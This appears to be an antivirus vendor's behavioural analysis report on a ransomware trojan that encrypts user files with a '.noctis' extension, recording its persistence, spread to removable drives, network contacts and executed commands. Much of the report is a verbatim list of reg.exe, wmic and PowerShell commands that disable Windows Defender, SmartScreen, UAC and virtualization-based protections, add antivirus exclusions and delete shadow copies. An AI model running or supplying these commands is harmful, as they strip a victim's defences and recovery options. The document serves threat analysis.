Technical Information
To ensure autorun and distribution
Modifies the following registry keys
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'OneDrive Update' = '<Full path to file>'
Creates or modifies the following files
- <SYSTEM32>\tasks\windowssecuritybealthservice
Creates the following files on removable media
- <Drive name for removable media>:\dialmap.bmp
- <Drive name for removable media>:\thlps_keeper_mayer_1965.docx
- <Drive name for removable media>:\dashborder_192.bmp
Malicious functions
To complicate detection of its presence in the operating system,
blocks execution of the following system utilities:
- Windows Defender
blocks the following features:
- User Account Control (UAC)
adds antivirus exclusion:
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '<Full path to file>'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "Add-MpPreference -ExclusionProcess '<File name>.exe'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "Set-MpPreference -DisableIOAVProtection $true"
Launches a large number of processes
Patches code
in NTDLL dll
- jnao.exe process, ntdll.dll module
Reads files which store third party applications passwords
- %HOMEPATH%\desktop\13.jpg
- %HOMEPATH%\desktop\alert.html
- %HOMEPATH%\desktop\browse.html
- %HOMEPATH%\desktop\2.jpg
- %HOMEPATH%\desktop\contoso_1.cer
- %HOMEPATH%\desktop\cveuropeo.doc
- %HOMEPATH%\desktop\210252809.jpg
- %HOMEPATH%\desktop\3.jpeg
- %HOMEPATH%\desktop\dashborder_96.bmp
- %HOMEPATH%\desktop\4f0bf7ff71f28.jpg
- %HOMEPATH%\desktop\fi51.doc
- %HOMEPATH%\desktop\adhd_and_obesity.docx
- %HOMEPATH%\desktop\glidescope_review_rev_010.docx
- %HOMEPATH%\desktop\advice_process.htm
- %HOMEPATH%\desktop\ituneshelpunavailable.htm
- %HOMEPATH%\desktop\join.avi
- %HOMEPATH%\desktop\ovp25012015.doc
- %HOMEPATH%\desktop\parnas_01.jpg
- %HOMEPATH%\desktop\pushkin.jpg
- %HOMEPATH%\desktop\region-north-karelia.jpg
- %HOMEPATH%\desktop\sdksampleunprivdeveloper.cer
- %HOMEPATH%\desktop\thlps_keeper_mayer_1965.docx
- %HOMEPATH%\desktop\tileimage.bmp
- %HOMEPATH%\desktop\toolbar.bmp
- %HOMEPATH%\desktop\uep_form_786_bulletin_1726i602.doc
Modifies file system
Creates the following files
- %APPDATA%\windowsupdates\.session
- %TEMP%\nwg50c.tmp
- %TEMP%\noctis_wallpaper.bmp
Deletes following files that it created itself
- %TEMP%\nwg50c.tmp
Modifies the following files
- %HOMEPATH%\.oracle_jre_usage\90737d32e3aba6b.timestamp
- <Drive name for removable media>:\thlps_keeper_mayer_1965.docx
- %HOMEPATH%\.oracle_jre_usage\90737d32e3aba6b.timestamp.noctis
- %HOMEPATH%\desktop\alert.html
- <Drive name for removable media>:\dialmap.bmp
- %HOMEPATH%\desktop\alert.html.noctis
- <Drive name for removable media>:\dialmap.bmp.noctis
- <Drive name for removable media>:\thlps_keeper_mayer_1965.docx.noctis
- <Drive name for removable media>:\dashborder_192.bmp
- <Drive name for removable media>:\dashborder_192.bmp.noctis
- %HOMEPATH%\favorites\bing.url
- %HOMEPATH%\favorites\bing.url.noctis
- %HOMEPATH%\searches\winrt--{s-1-5-21-4226853953-3309226944-3078887307-1000}-.searchconnector-ms
- %HOMEPATH%\searches\winrt--{s-1-5-21-4226853953-3309226944-3078887307-1000}-.searchconnector-ms.noctis
- %APPDATA%\microsoft\windows\themes\transcodedwallpaper
Modifies user data files (Trojan.Encoder).
Changes user data files extensions (Trojan.Encoder).
Network activity
Connects to
- 'ma##.#itnova.click':443
- 'ap#.#pify.org':443
TCP
Other
- 'ma##.#itnova.click':443
- 'ap#.#pify.org':443
UDP
- DNS ASK ma##.#itnova.click
- DNS ASK ap#.#pify.org
- DNS ASK ba##.#bitnndva.ied
Miscellaneous
Executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mon_projet.exe" /v DisableExceptionChainValidation /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add HKLM\SYSTEM\CurrentControlSet\Control\CI\Policy /v VerifiedAndReputablePolicyState /t REG_DWORD /d 0 /f
- '<SYSTEM32>\cmd.exe' /C "wmic /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference CALL Set DisableRealtimeMonitoring=true"
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v SmartAppControlState /t REG_DWORD /d 0 /f
- '<SYSTEM32>\wbem\wmic.exe' /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference CALL Set DisableRealtimeMonitoring=true
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer /v SmartScreenEnabled /t REG_SZ /d Off /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
- '<SYSTEM32>\schtasks.exe' /create /f /tn WindowsSecurityBealthService /tr <Full path to file> /sc onlogon /rl highest
- '<SYSTEM32>\cmd.exe' /c ver
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Policies\Microsoft\Windows\System /v EnableSmartScreen /t REG_DWORD /d 0 /f
- '<SYSTEM32>\cmd.exe' /C "wmic /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference CALL Set DisableBehaviorMonitoring=true"
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -Command "Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }"
- '<SYSTEM32>\reg.exe' add HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard /v EnableVirtualizationBasedSecurity /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
- '<SYSTEM32>\wbem\wmic.exe' /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference CALL Set DisableBehaviorMonitoring=true
- '<SYSTEM32>\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance /v Enabled /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d %TEMP%\noctis_wallpaper.bmp /f
- '<SYSTEM32>\reg.exe' add HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity /v Enabled /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v LsaCfgFlags /t REG_DWORD /d 0 /f
- '<SYSTEM32>\rundll32.exe' user32.dll,UpdatePerUserSystemParameters
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f
- '<SYSTEM32>\cmd.exe' /C "wmic /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference CALL Set DisableIOAVProtection=true"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "$WshShell = New-Object -ComObject WScript.Shell; $Shortcut = $WshShell.CreateShortcut('%HOMEPATH%\Desktop\DECRYPT YOUR FILES.lnk'); $Shortcut.TargetPath = '<Full p...
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
- '<SYSTEM32>\wbem\wmic.exe' /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference CALL Set DisableIOAVProtection=true
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f